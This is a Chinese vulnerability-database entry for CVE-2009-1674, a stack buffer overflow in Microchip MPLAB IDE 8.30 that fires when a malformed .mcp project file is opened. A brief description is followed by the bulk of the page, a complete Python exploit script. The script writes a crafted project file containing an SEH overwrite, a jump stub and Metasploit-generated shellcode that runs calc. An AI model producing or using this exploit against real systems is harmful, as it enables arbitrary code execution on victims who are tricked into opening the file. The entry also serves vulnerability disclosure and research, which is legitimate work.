Microchip MPLAB IDE .mcp文件处理栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1182771 漏洞类型 缓冲区溢出
发布时间 2009-05-11 更新时间 2009-06-19
CVE编号 CVE-2009-1674 CNNVD-ID CNNVD-200905-235
漏洞平台 N/A CVSS评分 9.3
|漏洞来源
https://www.securityfocus.com/bid/34897
https://cxsecurity.com/issue/WLB-2009050179
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-235
|漏洞详情
MPLABIDE是一种在PC机上运行的软件,用来为Microchip单片机开发应用程序。MCP文件用于存储有关MPLABIDE项目的必要信息。如果用户受骗使用MPLABIDE打开了包含有超长[FILE_INFO]或[CAT_FILTERS]字段的畸形.mcp文件的话,就可能触发栈溢出,导致执行任意代码。
|漏洞EXP
# usage: mplab.py then open the project file :)
# Download : http://ww1.microchip.com/downloads/en/DeviceDoc/MPLAB_8.30.zip (nadli chouk fi rassi :p)
print "**************************************************************************"
print " MPLAB IDE 8.30 (.mcp) Universal Seh Overwrite Exploit\n"
print " Refer : Secunia advisory (35054)\n"
print " Exploit code: His0k4\n"
print " Tested on: Windows XP Pro SP3 (EN)\n"
print " Greetings to:"
print " All friends & muslims HaCkers(dz),snakespc.com\n"
print "**************************************************************************"
         	

header1 = (
"\x5b\x48\x45\x41\x44\x45\x52\x5d\x0d\x0a\x6d\x61\x67\x69\x63\x5f"
"\x63\x6f\x6f\x6b\x69\x65\x3d\x7b\x36\x36\x45\x39\x39\x42\x30\x37"
"\x2d\x45\x37\x30\x36\x2d\x34\x36\x38\x39\x2d\x39\x45\x38\x30\x2d"
"\x39\x42\x32\x35\x38\x32\x38\x39\x38\x41\x31\x33\x7d\x0d\x0a\x66"
"\x69\x6c\x65\x5f\x76\x65\x72\x73\x69\x6f\x6e\x3d\x31\x2e\x30\x0d"
"\x0a\x5b\x50\x41\x54\x48\x5f\x49\x4e\x46\x4f\x5d\x0d\x0a\x64\x69"
"\x72\x5f\x73\x72\x63\x3d\x0d\x0a\x64\x69\x72\x5f\x62\x69\x6e\x3d"
"\x0d\x0a\x64\x69\x72\x5f\x74\x6d\x70\x3d\x0d\x0a\x64\x69\x72\x5f"
"\x73\x69\x6e\x3d\x0d\x0a\x64\x69\x72\x5f\x69\x6e\x63\x3d\x0d\x0a"
"\x64\x69\x72\x5f\x6c\x69\x62\x3d\x0d\x0a\x64\x69\x72\x5f\x6c\x6b"
"\x72\x3d\x0d\x0a\x5b\x43\x41\x54\x5f\x46\x49\x4c\x54\x45\x52\x53"
"\x5d\x0d\x0a\x66\x69\x6c\x74\x65\x72\x5f\x73\x72\x63\x3d\x2a\x2e"
"\x61\x73\x6d\x0d\x0a\x66\x69\x6c\x74\x65\x72\x5f\x69\x6e\x63\x3d"
"\x2a\x2e\x68\x3b\x2a\x2e\x69\x6e\x63\x0d\x0a\x66\x69\x6c\x74\x65"
"\x72\x5f\x6f\x62\x6a\x3d\x2a\x2e\x6f\x0d\x0a\x66\x69\x6c\x74\x65"
"\x72\x5f\x6c\x69\x62\x3d\x2a\x2e\x6c\x69\x62\x0d\x0a\x66\x69\x6c"
"\x74\x65\x72\x5f\x6c\x6b\x72\x3d\x2a\x2e\x6c\x6b\x72\x0d\x0a\x5b"
"\x53\x55\x49\x54\x45\x5f\x49\x4e\x46\x4f\x5d\x0d\x0a\x73\x75\x69"
"\x74\x65\x5f\x67\x75\x69\x64\x3d\x7b\x36\x42\x33\x44\x41\x41\x37"
"\x38\x2d\x35\x39\x43\x31\x2d\x34\x36\x44\x44\x2d\x42\x36\x41\x41"
"\x2d\x44\x42\x44\x41\x45\x34\x45\x30\x36\x34\x38\x34\x7d\x0d\x0a"
"\x73\x75\x69\x74\x65\x5f\x73\x74\x61\x74\x65\x3d\x0d\x0a\x5b\x54"
"\x4f\x4f\x4c\x5f\x53\x45\x54\x54\x49\x4e\x47\x53\x5d\x0d\x0a\x54"
"\x53\x7b\x42\x46\x44\x32\x37\x46\x42\x41\x2d\x34\x41\x30\x32\x2d"
"\x34\x43\x30\x45\x2d\x41\x35\x45\x35\x2d\x42\x38\x31\x32\x46\x33"
"\x45\x37\x37\x30\x37\x43\x7d\x3d\x2f\x6f\x22")

header2 = (
"\x2e\x63\x6f\x66\x22\x0d\x0a\x54\x53\x7b\x41\x44\x45\x39\x33\x41"
"\x35\x35\x2d\x43\x37\x43\x37\x2d\x34\x44\x34\x44\x2d\x41\x34\x42"
"\x41\x2d\x35\x39\x33\x30\x35\x46\x37\x44\x30\x33\x39\x31\x7d\x3d"
"\x0d\x0a")


# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x79"
"\x1f\x8c\x11\x83\xeb\xfc\xe2\xf4\x85\xf7\xc8\x11\x79\x1f\x07\x54"
"\x45\x94\xf0\x14\x01\x1e\x63\x9a\x36\x07\x07\x4e\x59\x1e\x67\x58"
"\xf2\x2b\x07\x10\x97\x2e\x4c\x88\xd5\x9b\x4c\x65\x7e\xde\x46\x1c"
"\x78\xdd\x67\xe5\x42\x4b\xa8\x15\x0c\xfa\x07\x4e\x5d\x1e\x67\x77"
"\xf2\x13\xc7\x9a\x26\x03\x8d\xfa\xf2\x03\x07\x10\x92\x96\xd0\x35"
"\x7d\xdc\xbd\xd1\x1d\x94\xcc\x21\xfc\xdf\xf4\x1d\xf2\x5f\x80\x9a"
"\x09\x03\x21\x9a\x11\x17\x67\x18\xf2\x9f\x3c\x11\x79\x1f\x07\x79"
"\x45\x40\xbd\xe7\x19\x49\x05\xe9\xfa\xdf\xf7\x41\x11\xef\x06\x15"
"\x26\x77\x14\xef\xf3\x11\xdb\xee\x9e\x7c\xed\x7d\x1a\x1f\x8c\x11")
	
buff = "\x41" * (226-len(shellcode))
next_seh = "\x74\xc9\x41\x42"
seh = "\x12\x13\x40\x00" #p/p/r MPLAB.exe
nops1 = "\x90"*20
nops2 = "\x90"*28
mshellcode = "\xE9\x47\xFF\xFF\xFF" #welli 3liya :p

exploit = header1 + buff + shellcode + nops1 + mshellcode + nops2 + next_seh + seh + header2

try:
    out_file = open("exploit.mcp",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nExploit file created!\n")
except:
    print "Error"

|受影响的产品
Microchip MPLAB IDE 8.30
|参考资料

来源:MILW0RM
名称:8656
链接:http://www.milw0rm.com/exploits/8656
来源:SECUNIA
名称:35054
链接:http://secunia.com/advisories/35054